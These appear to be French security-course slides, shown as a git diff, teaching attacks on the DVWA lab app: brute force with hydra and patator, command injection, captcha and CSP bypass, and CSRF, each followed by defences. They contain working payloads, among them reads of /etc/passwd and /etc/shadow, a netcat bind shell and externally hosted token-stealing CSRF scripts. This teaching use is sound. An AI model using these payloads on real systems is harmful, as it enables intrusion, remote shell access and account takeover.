### <i class="fa fa-medkit"></i> Se protéger
* bien choisir son système d'authentification
* bien implémenter son système d'authentification
* [ESAPI (The OWASP Enterprise Security API)](https://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API)
* libs & bundles éprouvés
* mettre en place un deuxième facteur d'authentification
* utiliser la crypto asymétrique
content/slides/1337/md/browser.md 0 → 100644
View file @ 12c34d1d
## Browsers
![Browsers](images/browsers/main-desktop-browser-logos.png "Browsers")
## Stats
[![Stats 08/2024](images/browsers/stats-browser-08-2024.png "Stats 08/2024")](https://en.wikipedia.org/wiki/Usage_share_of_web_browsers)
## Browser
<quote>
Un navigateur web est un logiciel conçu pour consulter et afficher le World Wide Web. Techniquement, c'est au minimum un client HTTP.
</quote>
* [Navigateur web](https://fr.wikipedia.org/wiki/Navigateur_web)
* [moz://a > L’histoire des navigateurs web](https://www.mozilla.org/fr/firefox/browsers/browser-history/)
Dans la plupart des cas un navigateur embarque un interpréteur [javascript](js.html): ce qui induit quelque garde fous ...
\ No newline at end of file
content/slides/1337/md/bruteforce.md 0 → 100644
View file @ 12c34d1d
# Brute Force
## AKA burning cpu
### <i class="fas fa-cogs"></i> force brute
* par dictionnaires
* liste d'utilisateurs + liste de mots de passe
* optimisable avec
* de la probabilité
* [des dictionnaires au hasard](https://dazzlepod.com/site_media/txt/passwords.txt)
* de l'ingénieurie sociale
* du flaire etc ...
### <i class="fas fa-cogs"></i> force brute
* par recherche
* combinatoire
* hybride
* décliner via des règles les propositions d'un dictionnaire
* ["leetspeakation"](https://fr.wikipedia.org/wiki/Leet_speak) automatique
* [John the Ripper](http://www.openwall.com/john/) permet de générer des mots de passes dérivant de parties du username
### <i class="fa-solid fa-bomb"></i> Brute force / low
extract rockyou.txt
```bash
cd /usr/share/wordlists
sudo gzip -d rockyou.txt.gz
```
```bash
export security=low
export PHPSESSID=esiff3kfto23f7uit3vr90jks4
hydra -l admin \
-P /usr/share/wordlists/rockyou.txt \
dv.wa \
http-form-get "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:H=Cookie\: PHPSESSID=${PHPSESSID}; security=${security};:Username and/or password incorrect."
```
### <i class="fa-solid fa-bomb"></i> Brute force / medium
* `sleep(2)` : Un peu plus long.
```shell
export security=medium
export PHPSESSID=esiff3kfto23f7uit3vr90jks4
```
```shell
patator http_fuzz method=GET follow=0 accept_cookie=0 --threads=1 --rate-limit=2 timeout=10 \
url="http://dv.wa/vulnerabilities/brute/?username=admin&password=FILE0&Login=Login" \
0=/usr/share/wordlists/rockyou.txt \
header="Cookie: security=${security}; PHPSESSID=${PHPSESSID}" \
resolve="dv.wa:172.16.76.146" \
-x ignore:fgrep='Username and/or password incorrect.'
```
* [patator](https://github.com/lanjelot/patator)
* resolv= -> [buggy version](https://bytemeta.vip/repo/lanjelot/patator/issues/174)
### <i class="fa-solid fa-bomb"></i> Brute force / high
capturer la soumission du formulaire
![capturer la soumission du formulaire dans Proxy](images/authentication/dvwa-auth-high-capture-request.png)<!-- .element style="width: 90%" -->
### <i class="fa-solid fa-bomb"></i> Brute force / high
envoyer la requête dans *Intruder*
![envoyer la requête dans Intruder](images/authentication/dvwa-auth-high-send-intruder.png)<!-- .element style="width: 90%" -->
### <i class="fa-solid fa-bomb"></i> Brute force / high
* onglet *Intruder*
* *attack type* -> *pitchfork*
* ne laisser que password et user_token en paramètres
![Intruder configuré](images/authentication/dvwa-auth-high-intruder-clean.png)<!-- .element style="width: 90%" -->
### <i class="fa-solid fa-bomb"></i> Brute force / high
* onglet *Payloads*
* *Payload set*: 1 (mot de passe) -> *Simple list*
* *Payload settings [Simple list]* -> *load* -> */usr/share/wordslists/fasttrack.txt*
![Intruder / mot de passe](images/authentication/dvwa-auth-high-simple-list.png)<!-- .element style="width: 90%" -->
### <i class="fa-solid fa-bomb"></i> Brute force / high
* *Payload set*: 2 (token anti CSRF) -> *Recursive grep*
* onglet *Settings*
* *Grep - Extract* -> *add*
![Intruder / token](images/authentication/dvwa-auth-high-define-grep-extract.png)<!-- .element style="width: 90%" -->
### <i class="fa-solid fa-bomb"></i> Brute force / high
* *Payload set*: 2 (token anti CSRF) -> *Recursive grep*
* onglet *Settings*
* *Redirections* -> *always*
![Intruder / folow redirect](images/authentication/dvwa-auth-high-follow-redirect.png)<!-- .element style="width: 90%" -->
### <i class="fa-solid fa-bomb"></i> Brute force / high
* onglet *Resource pool*
* cocher *create new resource pool*
![Intruder / Ressource](images/authentication/dvwa-auth-high-ressources.png)<!-- .element style="width: 90%" -->
### <i class="fa-solid fa-bomb"></i> Brute force / high
![Intruder / Resolved](images/authentication/dvwa-auth-high-resolved.png)<!-- .element style="width: 90%" -->
### <i class="fas fa-cogs"></i> force brute offline
* Dépend de la puissance de calcul
* Non furtive
* Reproductible
### <i class="fas fa-cogs"></i> force brute offline
* [OPHCRACK (the time-memory-trade-off-cracker)](http://lasecwww.epfl.ch/~oechslin/projects/ophcrack/)
* monde windows
* fichiers SAM
* fonctionne avec des [dictionnaires](http://ophcrack.sourceforge.net/tables.php)
* <i class="fa fa-gift"></i> <a href="http://www.newbiecontest.org/index.php?page=epreuve&no=224">obtenir le pass d'un compte windows en moins de 10 minutes</a>
* [Password Cracking: Lesson 2](http://www.computersecuritystudent.com/SECURITY_TOOLS/PASSWORD_CRACKING/lesson2/)
### <i class="fas fa-cogs"></i> force brute offline
* [John the Ripper](http://www.openwall.com/john/)
* monde UNIX/BSD
* fichier /etc/passwd + /etc/shadow
* mangling rules: leet speak, custom ...
```shell
unshadow /etc/passwd /etc/shadow > mypasswd
```
* [Checking Password Complexity with John the Ripper](http://www.admin-magazine.com/Articles/John-the-Ripper)
### <i class="fas fa-cogs"></i> force brute rainbow table
* [CrackStation](https://crackstation.net/)
* avec la signature de smithy dans la table user
```shell
5f4dcc3b5aa765d61d8327deb882cf99
```
### <i class="fa fa-medkit"></i> Se protéger
* instaurer des règles de durcissement au moment du choix du mot de passe
* pas contournable côté client ;)
* mettre un nombre d'essais maximum consécutifs
* plugin anti brute force
* wordpress
* drupal
* compléter par des restrictions par IP, voir par blocs d'IPs
* sensibilisez vos utilisateurs
content/slides/1337/md/captcha.md 0 → 100644
View file @ 12c34d1d
## <i class="fa fa-medkit"></i> [reCAPTCHA - Google](https://www.google.com/recaptcha/intro/index.html)
[http://dvwa.com/vulnerabilities/captcha](http://dvwa.com/vulnerabilities/captcha)
* Security level: low
* action configurée en 2 étapes
* Etape 1
* validation du captcha
* Etape 2
* exécution de l'action
* en modifiant le paramètre step à 2 on bypass le captcha
## <i class="fa fa-medkit"></i> [reCAPTCHA - Google](https://www.google.com/recaptcha/intro/index.html)
* Security level: medium
* action configurée en 3 étapes
* Etape 1
* validation du captcha
* Etape 2
* Confirmation de l'action
* Etape 3
* exécution de l'action
* en modifiant le paramètre step à 2 et en ajoutant Change=Change on bypass le captcha
## <i class="fa fa-medkit"></i> Se préserver
* Côté client
* [RequestPolicy](https://addons.mozilla.org/fr/firefox/addon/requestpolicy) protège mais peut empêcher certains sites de fonctionner
* [CsFire](https://addons.mozilla.org/fr/firefox/addon/csfire) protège un peu en enlevant toute information d'authentification pour les requêtes cross-site
* [NoScript](https://addons.mozilla.org/fr/firefox/addon/noscript) va prémunir des scripts en provenance de sites non sûrs
* [Self-Destructing Cookies](https://addons.mozilla.org/fr/firefox/addon/self-destructing-cookies) permet de réduire la fenêtre d'attaque en supprimant les cookies dès qu'ils ne sont plus associé à un onglet actif
content/slides/1337/md/cmdi.md 0 → 100644
View file @ 12c34d1d
# Command execution
## aka [command injection](https://www.owasp.org/index.php/Command_Injection)
### <i class="fas fa-cogs"></i> CMDi
* paramètres non filtrés
* la commande est écrite en dur
* exécution de commandes arbitraires sur le serveur
* exécutée avec les droits du serveur (thread)
* triviale mais assez rare
### <i class="fa-solid fa-bomb"></i> CMDi / low
* Unix
* Pipeline
* redirection la sortie standard: **|**
* redirection la sortie d'erreur: **|&**
* List
* séparateur de commande: **;**
* arrière plan: **&**
* et logique: **&&**
* ou logique: **||**
### <i class="fa-solid fa-bomb"></i> CMDi / low
```shell
localhost && ls
; whoami
localhost | id
```
* le réseau est également explorable
Note:
- dvwa à brutforcer
- non y a le cookie qui coince :/
- admin:password
- https://securenetworkmanagement.com/dvwa-and-hydra-login-dvwa-part-1/
- il faut injecter des commandes que le server connait
- win/unix/linux/bsd/solarix/aix
- pool de commandes par défaut
- l'enchainement d'exlpoits est laisser à l'imagination du pentester
- plus il est expérimenté plus il peut créer des attques complexes
- plus il peut aller loin dans l'exploitation
- Regarder le code
- Que peut on faire pour améliorer
- DVWA Security -> medium
### <i class="fa-solid fa-bomb"></i> CMDi / medium
les chaînes de caractères "&&" et ";" sont interdites
```shell
# Pour y voir plus clair
localhost | ls
# Plus intéressant
localhost | pwd & whoami & ps
localhost | uname -a & users & id & w
localhost | cat /etc/group
localhost | cat /etc/passwd
```
Note:
- approche liste noire toujours perdante
- liste de caractère à échapper
- résultat visible
- affiché dans la page
- méga rare
- aveugle
- certaines pas faciles à détecter
- adduser / mkdir lors de la création de compte
- un username se terminant par
- ;cmd
- ping réseau
- on sait si ca a marcher avec le temps d'exécution du ping
- si ca rame au chargement de la page
- c'est que le ping est en train de s'exécuter à l'infini
- sinon sniffer le ping de retour
- si pas bloqué
- ping -c3 127.0.0.1 pour mémoire
- résolution dns d'un domaine maitrisé connu de nous seul
- Regarder le code
- Que peut on faire pour amliorer
- DVWA Security -> high
### <i class="fa-solid fa-bomb"></i> CMDi / high
```shell
localhost|ls
```
Note:
-détailler l'expression régulière
### <i class="fa-solid fa-bomb"></i> CMDi / impossible
* l'approche est ici différente
* on ne cherche plus à éliminer les caractères dangereux
* on cherche à valider que l'entrée est bien une IP
```shell
$valid = preg_match('/^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\z/', $string);
```
Note:
-détailler l'expression régulière
### <i class="fas fa-cogs"></i> bind shell
* ex netcat
```shell
sudo apt install ncat
```
* injecter
```shell
1 | ncat -v -e '/bin/bash' -l -p 8080
```
* puis sur le terminal de l'attaquant
```shell
ncat -v dv.wa 8080
```
* \o/ accès distant à la machine
* avec les permissions de l'utilisateur www-data
Note:
- revenir en medium ou low security
- on peut le faire avec cookie manager +
- netcat couteau suisse réseau
- permet d'écrire sur un port
- soumis a pas mal de condition en vérité
- marche que dans un sens
- DMZ coupe tout le sortant
- reste possible dans ce sens
- mais faut passer d'eventuels friewalls
- et netcat peu avoir été supprimé
### <i class="fa fa-medkit"></i> Se préserver
* éviter les commandes [exec](http://php.net/manual/fr/function.exec.php), [shell_exec](http://php.net/manual/fr/function.shell-exec.php), [passtru](http://php.net/manual/fr/function.passthru.php) ou [system](http://php.net/manual/fr/function.system.php)
* utiliser shell_escape_args() en php
* utliser JSON.parse plutot qu'un eval() de JSON
* utiliser des lib spéacilisées
* [<i class="fab fa-github"></i> symfony/Filesystem](https://github.com/symfony/Filesystem)
* [<i class="fab fa-github"></i> symfony/Finder](https://github.com/symfony/Finder)
Note:
- faire marcher le bon sens
- Note le cron de drupal est pourri parce qu'appelable via des url
- utiliser le cron system
### <i class="fa fa-medkit"></i> Se préserver
* utiliser des listes blanches plutôt que des listes noires
* utiliser cron pour les traitements récurrents
* ne pas installer `netcat` ...
content/slides/1337/md/csp.md 0 → 100644
View file @ 12c34d1d
# CSP
## a.k.a. Content Security Policy
### <i class="fa fa-medkit"></i> **CSP**: Content Security Policy
* En-tête renvoyée côté serveur
* protéger son contenu
* protéger ses utilisateurs
* possibilité de reporting
* quelles tentatives ont été menées
* https://developer.mozilla.org/en-US/docs/Web/Security/CSP/CSP_policy_directives
### <i class="fa fa-medkit"></i> **CSP**: Content Security Policy
```http
Content-Security-Policy:
script-src 'self' https://apis.google.com;
frame-src 'none'
```
* informera le browser que
* seuls les scripts en provenance de la page elle même et de apis.google.com pourront être exécutés
* les balises iframes ne doivent pas être interprétées
### <i class="fa fa-medkit"></i> **CSP**: Content Security Policy
![CSP](images/xss/csp.png "CSP")<!-- .element style="text-align: center" -->
* [<i class="fa fa-newspaper-o"></i> Why is CSP Failing? Trends and Challenges in CSP Adoption](mweissbacher.com/publications/csp_raid.pdf)
Note:
- couvre le cas d'un XSS js dans une balise src
- couvre également le cas d'une iframe qui recouvre une page légitime
### <i class="fa-solid fa-bomb"></i> CSP / low
```http
Content-Security-Policy:
script-src 'self' https://pastebin.com hastebin.com
www.toptal.com example.com code.jquery.com
```
* écriture d'un fichier js sur l'hôte local via une autre faille [upload](upload.html) par exemple
### <i class="fa-solid fa-bomb"></i> CSP / low
* exécution directement sur [https://pastebin.com/raw/SAB3JTJc](https://pastebin.com/raw/SAB3JTJc)
* réponse pastebin
```http
...
X-Content-Type-Options: nosniff
...
```
### <i class="fa-solid fa-bomb"></i> CSP / low
* ne fonctionne pas depuis Firefox 72
* l'entête [X-Content-Type-Options](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Content-Type-Options) force la désactivation du [MIME sniffing](https://developer.mozilla.org/en-US/docs/Web/HTTP/Basics_of_HTTP/MIME_types#mime_sniffing)
* https://www.komodosec.com/post/mime-sniffing-xss
* https://medium.com/@puneet29/what-is-mime-sniffing-4f402d303dc8
content/slides/1337/md/csrf.md 0 → 100644
View file @ 12c34d1d
# CSRF
## aka Cross-Site Request Forgery
### <i class="fas fa-cogs"></i> CSRF
* affecte toute ressource disponible directement
* sans étape intermédiaire
* avec authentification
* usurpation de session
* ou pas
* redirection arbitraire
### <i class="fas fa-cogs"></i> CSRF
![alt text](images/csrf/csrf.png "CSRF")
Note:
- rappel ici mail, mais aussi
- XSS
- lien déguisé
- url shortner
### <i class="fas fa-ice-cream"></i> CSRF / types
* urls / formulaires forgés relayés via [XSS](xss.html)
* redirections arbitraires relayés via [XSS](xss.html)
* social engineering
* initulé de lien malicieux
* url shortner
* phishing
* par mail
* par [XSS stored](xss.html)
### <i class="fa-solid fa-bomb"></i> CSRF / payload
* le but est de rediriger un utilisateur vers une url
* à l'insu de son plein gré
* exécuter des opérations avec les permissions d'un autre utilisateur
* envoyer du spam (de commentaire)
Note:
- l'action avec privilège
- urls connues (CMS, ...)
- on espère que l'utilisateur est logué
- spam de commentaire
- urls connues (CMS, ...)
### <i class="fa-solid fa-bomb"></i> CSRF / low
```
New password: pipo
Confirm new password: pipo
```
<small><i class="fa-solid fa-circle-check"></i> [/vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&Change=Change#](http://dv.wa/vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&Change=Change#)</small>
* via GET en injectant
```http
<iframe
src="javascript:window.location='http://dv.wa/vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&Change=Change#';"
height="0" width="0" style="border:0;">
</iframe>
```
* possible via POST avec en scriptant
```http
<form action="http://dv.wa/vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&Change=Change#" method="post" id="formid"
onload="document.getElementById('formid').submit();">
<input type="hidden" name="password_new" value="1337"/>
<input type="hidden" name="password_conf" value="1337"/>
</form>
```
Note:
- analyser la requête de changement de mot de passe avec burp
- forger une url
- forger un form
- injecter via XSS stored par exemple
- problème de l'action silencieuse et aveugle
- on ne sait pas sur qui ca marche
- si on a une liste des utilisateurs du site le brute force est un option
### <i class="fa-solid fa-bomb"></i> CSRF / medium
<small><i class="fa-solid fa-circle-xmark"></i> [/vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&Change=Change#](http://dv.wa/vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&Change=Change#)</small>
```
That request didn't look correct.
```
<small>comparaison requête forgée VS légitime <i class="fa-solid fa-right-long"></i> filtrage par referer</small>
```
if( stripos( $_SERVER[ 'HTTP_REFERER' ],
$_SERVER[ 'SERVER_NAME' ]) !== false ) {
```
<i class="fa-solid fa-circle-check"></i> ajouter un header via **burpsuite**
```
Referer: http://dv.wa/
```
<i class="fa-solid fa-circle-check"></i> passer par [XSS (stored) / low](http://dv.wa/vulnerabilities/xss_s)
```
Name: CSFR
Message: <img src="http://dv.wa/vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&Change=Change#" />
```
### <i class="fa-solid fa-bomb"></i> CSRF / high
* **session token** dans un nouveau champs caché du formulaire
```
<input
type="hidden"
name="user_token"
value="840473d541a2e5e4b28e39cc31762f9d">
```
* le **session token** peut aussi se trouver dans l'url
* éventuellement salaison propre à l'utilisateur
* IP, user-agent
* ajout d'entropie
### <i class="fas fa-medkit"></i> CSRF / high / session token
![alt text](images/csrf/csrf-stp.png "CSRF")
### <i class="fa-solid fa-bomb"></i> CSRF / high
<small><i class="fa-solid fa-circle-xmark"></i>[/vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&user_token=840473d541a2e5e4b28e39cc31762f9d&Change=Change#](http://dv.wa/vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&user_token=840473d541a2e5e4b28e39cc31762f9d&Change=Change#)</small>
<i class="fa-solid fa-lightbulb"></i> procéder en 2 temps
1. récupérer la valeur du session token
2. jouer la requête CSRF avec le session token
Possible via une [XSS](XSS.html) (mais cassé)
### <i class="fa-solid fa-bomb"></i> CSRF / high / payload js
* <small>hébergé sur un serveur malicieux [https://perso.limos.fr/mazenod/slides/1337/exploits/getToken.js](https://perso.limos.fr/mazenod/slides/1337/exploits/getToken.js)</small>
```
function getToken() {
var token='&user_token='
+ document
.getElementById("get_token")
.contentDocument
.getElementsByName("user_token")[0]
.value;
var link = "http://dv.wa/"
+ "vulnerabilities/csrf/?password_new=pipo&password_conf=pipo&Change=Change"
+ token;
document.getElementById("play_CSRF").src=link;
}
```
<i class="fa-solid fa-triangle-exclamation"></i> Ne marchera que sur dv.wa
### <i class="fa-solid fa-bomb"></i> CSRF / high / payload XSS
<i class="fa-solid fa-lightbulb"></i> cacher les iframes
```
<script src="https://perso.limos.fr/mazenod/slides/1337/exploits/getToken.js"></script>
Mine de rien
<iframe
id="get_token"
src="http://dv.wa/vulnerabilities/csrf/"
onload="getToken()" style="display:none"></iframe>
<iframe id="play_CSRF" style="display:none"></iframe>
```
<i class="fa-solid fa-triangle-exclamation"></i> A injecter dans [XSS / low](XSS.html)
<i class="fa-solid fa-triangle-exclamation"></i> A jouer dans [XSS / high](XSS.html)
### <i class="fa-solid fa-bomb"></i> CSRF / high / xhr / payload
* <small>hébergé sur un serveur malicieux [https://perso.limos.fr/mazenod/slides/1337/exploits/xhr.js](https://perso.limos.fr/mazenod/slides/1337/exploits/xhr.js)</small>
```
var xhr = new XMLHttpRequest();
xhr.open('GET', 'http://dv.wa/vulnerabilities/csrf/', true);
xhr.withCredentials = true;
xhr.responseType = "document";
xhr.onload = function () {
var token = xhr.response.getElementsByName('user_token')[0].value;
};
xhr.send();
var xhr2 = new XMLHttpRequest();
xhr2.open('GET', 'http://dv.wa/vulnerabilities/csrf/?password_new=hacked&password_conf=hacked&Change=Change&user_token=' + token, true);
xhr2.send();
```
```
<script src="https://perso.limos.fr/mazenod/slides/1337/exploits/xhr.js
```
<i class="fa-solid fa-triangle-exclamation"></i> A injecter dans [XSS / low](XSS.html) & jouer dans [XSS / high](XSS.html)
### <i class="fa fa-medkit"></i> CSRF / Se préserver
* **Fausses Bonnes Idées**
* utiliser la méthode POST
* vérifier le referer (ou n'importe quelle autre en-tête)
* Session token
* Double Submit Pattern
### <i class="fa fa-medkit"></i> CSRF / Cookie-To-Header Token
* adapté à une utilisation massive de JS
* basé sur la [Same Origin Policy](https://en.wikipedia.org/wiki/Same-origin_policy)
* A l'authentification le serveur envoie un cookie contenant un jeton aléatoire valable pendant toute la session de l'utilisateur
```js
Set-Cookie: Csrf-token=i8XNjC4b8KVok4uw5RftR38Wgp2BFwql;
expires=Thu, 23-Jul-2015 10:25:33 GMT;
Max-Age=31449600;
Path=/
```
### <i class="fa fa-medkit"></i> CSRF / Cookie-To-Header Token
* JavaScript lit le jeton et le renvoie dans un header HTTP spécifique à chaque requête
```js
X-Csrf-Token: i8XNjC4b8KVok4uw5RftR38Wgp2BFwql
```
* Le serveur vérifie la validité du token
* [Cookie-To-Header Token](https://en.wikipedia.org/wiki/Cross-site_request_forgery#Cookie-to-Header_Token)
\ No newline at end of file